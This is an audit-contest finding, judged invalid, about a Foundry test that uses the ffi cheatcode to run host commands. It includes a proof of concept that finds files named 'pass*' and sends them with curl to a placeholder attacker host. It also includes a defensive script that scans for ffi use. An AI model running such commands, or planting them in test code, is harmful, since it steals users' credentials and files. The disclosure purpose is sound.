Submission Details
Severity: low
Invalid

[H-1] Malicious Test Uses ffi Access Can Cause Data Extraction

Description: MerkleAirdropTest.t.sol::testPwned(), as its name suggests, uses the ffi cheatcode (ffi access is enabled in foundry.toml) to execute arbitrary commands on the user's machine.

```solidity
function testPwned() public {
    // Build the argv of the host command: `touch youve-been-pwned`.
    string[] memory cmds = new string[](2);
    cmds[0] = "touch";
    cmds[1] = string.concat("youve-been-pwned");
    // Runs the command on the machine executing `forge test`; only works with ffi enabled.
    cheatCodes.ffi(cmds);
}
```

Impact: The current test is not harmful, as it only creates an empty file, but the same mechanism can be used to harm users, steal private keys, or delete important information.

Proof of Concept:
Here is one simple way an attacker could steal data from a user's machine:

```solidity
function testFindCommand() public {
    // Runs a shell one-liner on the host and sends the result to an attacker-controlled server.
    string[] memory cmds = new string[](3);
    cmds[0] = "bash";
    cmds[1] = "-c";
    cmds[2] = "find / -name 'pass*' | curl -F 'data=@-' https://<HACKER_IP>/upload";
    cheatCodes.ffi(cmds);
}
```

Recommended Mitigation: Always exercise caution before running third-party code on your system. Make sure you understand what any command or script does before executing it, to prevent unintended consequences, especially where security is concerned.
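A pre-flight check of the kind this mitigation calls for, added here as an example (it is not part of the original submission or of Foundry itself): before `forge test` is run on an unfamiliar repository, it reports whether ffi is switched on in foundry.toml and lists every call to the ffi cheatcode in the project's Solidity files. The `audit_ffi` function name is my own.

```shell
#!/usr/bin/env sh
# Review helper: run as `audit_ffi path/to/repo` before `forge test`.
# Exit status 0 means nothing ffi-related was found; 1 means review the output.
# Note: ffi can also be enabled per run with `forge test --ffi`, so the config
# check alone is not sufficient; the source scan is what matters.
audit_ffi() {
    dir="${1:-.}"
    found=0

    # 1. Is ffi enabled in the project config (any [profile.*] section)?
    if [ -f "$dir/foundry.toml" ] && \
       grep -Eq '^[[:space:]]*ffi[[:space:]]*=[[:space:]]*true' "$dir/foundry.toml"; then
        echo "ffi enabled in $dir/foundry.toml"
        found=1
    fi

    # 2. Any Solidity file calling the cheatcode, whatever the Vm handle is
    #    named (vm.ffi, cheatCodes.ffi, hevm.ffi, ...). Print file:line so the
    #    reviewer can read the exact command each test would execute.
    hits=$(find "$dir" -name '*.sol' -exec grep -HEn '\.ffi[[:space:]]*\(' {} + 2>/dev/null || true)
    if [ -n "$hits" ]; then
        echo "ffi cheatcode calls:"
        echo "$hits"
        found=1
    fi

    return "$found"
}
```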

Updates

Lead Judging Commences

inallhonesty Lead Judge about 1 year ago
Submission Judgement Published
Invalidated
Reason: Out of scope
Assigned finding tags: ffi
